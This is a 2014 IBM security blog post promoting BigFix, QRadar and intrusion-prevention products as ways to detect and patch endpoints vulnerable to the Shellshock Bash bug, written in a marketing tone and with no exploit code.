October 10, 2014 By Rohan Ramesh 3 min read

Endpoint Security for Your Organization

An old maxim tells us an ounce of prevention is worth a pound of cure. And that’s great advice — unless you unfortunately missed the prevention step and need a cure quickly.

A quick Web search shows the severity of the recent Bash bug. There has been a lot of focus on prevention, which is great advice and something definitely worth listening to, but there hasn’t been a lot of information about the cure — until now.

To implement the cure for Shellshock, organizations need a way to assess their endpoint environment and then deploy and manage the patches for the myriad operating systems in their environment. An effective solution provides policy-based installation of security updates, closed-loop verification and the ability to manage patches across multiple platforms from a single point of control. It must also shrink patch deployment time to reduce the risks associated with Shellshock. As organizations look for best practices on how to update all of their affected systems, they look for a solution that can do the following:

  • Automatically manage patches for multiple operating systems across hundreds or thousands of endpoints, regardless of location, connection type or status
  • Reduce security and compliance risk by slashing remediation cycles from weeks to hours
  • Provide visibility into patch compliance with real-time monitoring and reporting
  • Patch online and offline virtual machines to improve security in virtual environments
  • Provide consistent functionality, even over low-bandwidth or globally distributed networks

To help organizations address this vulnerability, IBM provides security solutions that can help prevent, detect and respond to the Shellshock threat.

Preventing Shellshock

IBM has been able to identify and protect against attacks caused by this threat through its IBM Security Network Intrusion Prevention product offering. With its unique focus on identifying and shielding this vulnerability from an attempted exploit, IBM has been helping clients protect against these kinds of exploits since 2007.

Read more about how you could have prevented attackers from exploiting Shellshock and other similar vulnerabilities.

Detection

If an endpoint has already been exploited by Shellshock before patches have been made available, the way to find the threat is by understanding the behavior of all the individual attack components and by using analytics to understand their relationship.

The key tasks in detection include the following:

  • Discover: Understand where the Shellshock vulnerability is in your endpoint environment
  • Assess risk: Understand how exposed the instances of this vulnerability are to potential attack
  • Detect attacks: Monitor and detect potential exploits of the Shellshock vulnerability

A “closed loop” system can quickly detect threats and alert security administrators to take the necessary corrective actions. With IBM BigFix, you can quickly determine which endpoints — including servers, work stations and other devices — are vulnerable to the Bash bug. IBM Security QRadar can leverage data from network and endpoint security solutions to immediately see whether someone is trying to exploit an operating system vulnerability. IBM QRadar can then alert the security team to use endpoint management solutions, such as BigFix, to remediate the condition.

Responding

Today, it is not a matter of if an organization will be breached, but rather a question of when a breach will take place. This means organizations need to have the ability to respond rapidly once an initial incident or vulnerability has been detected. The key response functions include the following:

  • Identifying the type and version of OS on the previously detected vulnerable endpoints
  • Remediating the endpoints with the appropriate patch for the version of OS it is running

Having detected which endpoints are vulnerable and the various OS types and versions that these endpoints are running with Endpoint Manager, you now have to focus your efforts on patching these endpoints quickly and efficiently.

BigFix can rapidly apply patches across multiple operating systems within minutes, including UNIX, Linux and OS X, all of which have reportedly been affected by Shellshock. BigFix customers have realized up to a 98 percent first-pass patch success rate and can rapidly apply Shellshock patches for all OS types, including CentOS-5 and CentOS-6, RHEL 5 and RHEL 6, zLinux, SLE 11 and SLE 11 System z, Solaris, Mac OS X and Ubuntu. With the manager’s ability to provide real-time visibility into the status of managed endpoints, you can confirm all your endpoints have been patched and are more secure.

BigFix supports over 130 platforms out of the box and helps ensure your endpoints are in continuous compliance with your security and regulatory policies — all through a single console, regardless of endpoint type, OS version or location. By automating the remediation, BigFix helps customers close the loop by supporting the response phase of the IBM Threat Protection System.

An ounce of protection is certainly worth a pound of cure. With IBM Security solutions, you get both.

More from Endpoint

Unified endpoint management for purpose-based devices

4 min read - As purpose-built devices become increasingly common, the challenges associated with their unique management and security needs are becoming clear. What are purpose-built devices? Most fall under the category of rugged IoT devices typically used outside of an office environment and which often run on a different operating system than typical office devices. Examples include ruggedized tablets and smartphones, handheld scanners and kiosks. Many different industries are utilizing purpose-built devices, including travel and transportation, retail, warehouse and distribution, manufacturing (including automotive)…

Virtual credit card fraud: An old scam reinvented

3 min read - In today's rapidly evolving financial landscape, as banks continue to broaden their range of services and embrace innovative technologies, they find themselves at the forefront of a dual-edged sword. While these advancements promise greater convenience and accessibility for customers, they also inadvertently expose the financial industry to an ever-shifting spectrum of emerging fraud trends. This delicate balance between new offerings and security controls is a key part of the modern banking challenges. In this blog, we explore such an example.…

Endpoint security in the cloud: What you need to know

9 min read - Cloud security is a buzzword in the world of technology these days — but not without good reason. Endpoint security is now one of the major concerns for businesses across the world. With ever-increasing incidents of data thefts and security breaches, it has become essential for companies to use efficient endpoint security for all their endpoints to prevent any loss of data. Security breaches can lead to billions of dollars worth of loss, not to mention the negative press in…

Topic updates

Get email updates and stay ahead of the latest threats to the security landscape, thought leadership and research.
Subscribe today